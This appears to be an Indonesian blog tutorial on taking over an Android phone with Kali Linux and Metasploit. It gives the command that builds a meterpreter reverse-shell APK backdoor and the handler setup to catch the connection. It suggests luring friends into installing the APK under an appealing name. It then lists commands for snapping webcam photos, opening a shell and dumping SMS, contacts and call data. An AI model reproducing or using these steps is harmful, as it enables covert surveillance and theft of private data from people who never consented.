How To Hack Android With Kali Linux

Mungkin Sebelumnya Saya sudah membuat tutorial tentang Hack Windows 7 dengan kali Linux. Nah sekarang saya akan memberi tahu cara hack android dengan kali linux.

Oke Langsung saja step by step..
(Maaf kalau post tidak ada gambar,dikarenakan data Vbox nya hilang :D | Lagian ntar copas dari web laen gak ada gregetnya :D)

  • Harus mempunya Android dan PC/Lepi sebagai Kali Linux
  • Harus terkoneksi ke jaringan (WIFI) yang sama
Oke kita lanjut ke kali Linuxnya ya (y)

1. Buka Terminal pada Kali Linux.Jangan Lupa Akses ROOT nya dengan perintah
 #sudo su

2. Kemudian ketikkan perintah berikut untuk membuat backdoor pada android.
#msfpayload  android/meterpreter/reverse_tcp LHOST="IP_KALI" LPORT=4444 x > contoh.apk
*yang berwarna biru sesuaikan dan tanpa tanda petik (")
*setelah itu aplikasi contoh.apk akan terletak pada folder /root . kemudian install apk tersebut ke android yang ingin di hack. (kalo kamu jahil , upload aja ke internet trus buat namanya salampramuka.apk :D | pasti temanmu tertarik dan akan menginstallnya :D)


3. Kemudian Masuk ke msfconsole.
#msfconsole

4. Tunggu beberapa saat dan akan muncul msf>

5. Kemudian ketik perintah berikut :
>use exploit/multi/handler
>set payload android/meterpreter/reverse_tcp
>set LHOST ip_kali
>set LPORT 4444

6. Time to exploit...
>exploit 

*setelah di exploit segeralah tekan reverse_tcp pada aplikasi apk yang terinstall di android tadi)
*cara ini sudah test by me tapi saya belum sempat bikin video karna saya juga punya channel. kenapa tidak sempat ? | karena saya lagi sibuk di dunia nyata.

SAATNYA YANG DITUNGGU NIH !!

Berikut adalah contoh perintah untuk menggunakan/cara hack android tsb.

1. Mengetahui system informasi
>sysinfo

2. Ambil gambar dari kamera android
>webcam_list                    >untuk menampilkan jumlah / nomor kamera
>webcam_snap 1             >untuk ambil gambar via camera 1 (belakang) | 2 untuk depan.

3. Masuk ke terminal android (FATAL coeg kalo urusan terminal :D)
>shell

*bisa juga untuk mencuri data sms atau telpon dan kontak dengan cara >sms_dump untuk sms
*untuk lebih lengkap lagi kita bisa upload atau download data dari android ke pc(Curi data)
*untuk mengetahui perintah yang lain silahkan ketik HELP
Tidak ada komentar :